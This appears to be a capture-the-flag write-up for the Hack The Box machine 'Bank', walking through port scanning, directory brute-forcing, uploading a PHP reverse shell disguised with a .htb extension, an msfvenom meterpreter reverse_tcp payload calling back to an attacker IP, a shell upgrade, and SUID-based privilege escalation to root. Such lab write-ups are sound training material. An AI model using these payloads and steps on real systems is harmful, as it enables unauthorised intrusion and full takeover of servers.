nmap -sS -sV -p- -oN bank.txt 10.10.10.29
The result as follows:
Nmap scan report for 10.10.10.29 Host is up (0.0049s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done at Fri Dec 4 12:31:15 2020 -- 1 IP address (1 host up) scanned in 18.56 seconds
Looking clues of the foothold
Using the ip address only the apache intro page is present.
From the nmap result there is a dns port, by verifying with nslookup I confirmed bank.htb is the fqdn of 10.10.10.29, this is a guess.
On my own attacker’s machine I just need to add the hostname to my /etc/hosts.
By browsing the http://bank.htb with the browser a login page is presented.
Using dirbuster with 50 threads after some time a /balance-transfer was found.
By browsing the /balance-transfer a list of files, the size of each file is between 583 and 584 bytes, until one file that has 257 bytes found.
Get the foothold
On support page, I inspected the “Choose file…” element and found an interesting comment which says I can use htb as the extension for php.
My next step is to generate a php file and named as bank.htb then upload this php file by submitting a support ticket.
I can use the pentester monkey’s reverse php script or make one with msfvenom.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f raw > bank.htb
Before I upload the bank.htb I will set up a meterpreter server to listen for the connection.
Promote to a partial-interactive shell
python3 -c "import pty;pty.spawn('/bin/sh')"
Get the user flag
The user.txt file in /home/chris can be read by any one the chmod is 444.
Get the root
find / -perm -u=s -type f 2>/dev/null
The result has an unusual file that looked interesting.
This emergency program has a suid set which means I can run this program like the owner of the file and the owner is root, but i am not sure what this does, by moving up a level of the current directory there is a python2 script which has the same name.
So it is clear that emergency is a privesc tool, I can either run this script or run the emergency directly both works the same.
Reference: SUID risk
To understand about the risk of SUID click here.